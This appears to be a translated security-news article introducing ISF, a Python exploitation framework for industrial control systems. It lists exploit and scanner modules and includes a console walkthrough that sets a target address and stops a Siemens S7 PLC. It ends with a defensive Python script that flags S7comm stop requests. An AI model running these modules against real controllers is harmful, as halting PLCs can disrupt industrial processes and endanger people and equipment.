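Summary: ISF, a Python-based exploitation framework for industrial control systems
This article introduces ISF, an exploitation framework for industrial control systems. The tool is based on the open-source project routersploit and is written in Python. It works much like the Metasploit framework. We hope you find it useful.
ICS (industrial control system) protocol clients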
| Name | Path | Description |
| --- | --- | --- |
| modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP client |
| wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2 client (VxWorks 6.x) |
| s7_client | icssploit/clients/s7_client.py | s7comm client (S7 300/400 PLC) |
Exploit modules
| Name | Path | Description |
| --- | --- | --- |
| s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC start/stop |
| vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | VxWorks RPC remote DoS (CVE-2015-7599) |
| quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 series PLC start/stop |
| crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | Crash QNX Inetd TCP service |
| qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX QCONN remote code execution |
Scanner modules
| Name | Path | Description |
| --- | --- | --- |
| profinet-dcp-scan | scanners/profinet-dcp-scan.py | Profinet DCP scanner |
| vxworks_6_scan | scanners/vxworks_6_scan.py | VxWorks 6.x scanner |
| s7comm_scan | scanners/s7comm_scan.py | S7comm scanner |
ICS protocol modules (written with Scapy)
These protocol modules can be integrated with other fuzzing frameworks (such as Kitty), or you can use them to develop your own client tools.
| Name | Path | Description |
| --- | --- | --- |
| pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP Protocol |
| modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol |
| wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2 Protocol |
| s7comm | icssploit/protocols/s7comm.py | S7comm Protocol |
Installing the framework
Python dependencies
gnureadline (OSX only), requests, paramiko, beautifulsoup4, pysnmp, python-nmap, scapy
Installing on Kali Linux
The installation commands are as follows:
```
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
```
Using the tool
```
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ \|| / __ \_ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | \___ \\___ \| ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|_____\_____|_____/_____/|_| |______\____/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
```
Exploitation
```
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf(S7-300/400 PLC Control) >
```
Note: the Tab key can be used for command completion.
Options
Show the module options:
```
isf(S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port

Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.

isf(S7-300/400 PLC Control) >
```
Set an option:
```
isf(S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
```
Run the module:
```
isf(S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf(S7-300/400 PLC Control) >
```
Show the module information:
```
isf(S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
- wenzhe zhu <jtrkid[at]gmail.com>

References:

isf(S7-300/400 PLC Control) >
```
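On the monitoring side, the start/stop request this module sends is an S7comm job on TCP port 102, and it can be recognised from the frame headers alone. The following is an added example, not code from ISF or the original article: the function names (`classify_s7_payload`, `build_sample`, `alerts`) are hypothetical, and the sample frames are constructed with zero-padded parameters, so they are not valid PLC requests.

```python
import struct

# S7comm job function codes that change the CPU run state
STATE_FUNCS = {0x28: "PI service (used for PLC start)", 0x29: "PLC stop"}

def classify_s7_payload(payload: bytes):
    """Label a TCP/102 payload if it is an S7comm job that changes CPU state."""
    # TPKT: version (must be 3), reserved, total length (big-endian u16)
    if len(payload) < 7 or payload[0] != 3:
        return None
    tpkt_len = struct.unpack(">H", payload[2:4])[0]
    if tpkt_len < 7 or tpkt_len > len(payload):
        return None  # truncated or malformed frame
    # COTP: length indicator, then PDU type (0xF0 = DT, carries data)
    cotp_len = payload[4]
    if payload[5] != 0xF0:
        return None
    s7 = payload[5 + cotp_len:tpkt_len]
    # S7comm: proto id 0x32, ROSCTR, reserved(2), PDU ref(2), param len(2), data len(2)
    if len(s7) < 11 or s7[0] != 0x32 or s7[1] != 0x01:  # 0x01 = job request
        return None
    param_len = struct.unpack(">H", s7[6:8])[0]
    if param_len < 1:
        return None
    return STATE_FUNCS.get(s7[10])  # first parameter byte is the function code

def build_sample(func: int) -> bytes:
    """Constructed test frame: real headers, zero-padded (not valid) parameters."""
    s7 = bytes([0x32, 0x01, 0, 0, 0, 1]) + struct.pack(">HH", 4, 0) + bytes([func, 0, 0, 0])
    cotp = b"\x02\xf0\x80"
    return b"\x03\x00" + struct.pack(">H", 4 + len(cotp) + len(s7)) + cotp + s7

def alerts(events):
    """events: iterable of (source_ip, payload) pairs seen on TCP port 102."""
    out = []
    for src, payload in events:
        label = classify_s7_payload(payload)
        if label:
            out.append((src, label))
    return out

if __name__ == "__main__":
    # Constructed sample traffic; addresses are from the documentation range
    sample = [("192.0.2.10", build_sample(0x04)),     # read variable: ignored
              ("192.0.2.66", build_sample(0x29)),     # stop request: flagged
              ("192.0.2.66", b"GET / HTTP/1.1\r\n")]  # not S7comm: ignored
    for src, label in alerts(sample):
        print(f"ALERT {src}: S7comm {label}")
```

In practice the alert is most useful when the source address is compared against the list of engineering workstations that are allowed to change the CPU state.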
Tool documentation
3. S7 client usage guide
10. How to create a module
* Source: lastline. Compiled by FreeBuf editor Alpha_h4ck; please credit FreeBuf.COM when reposting.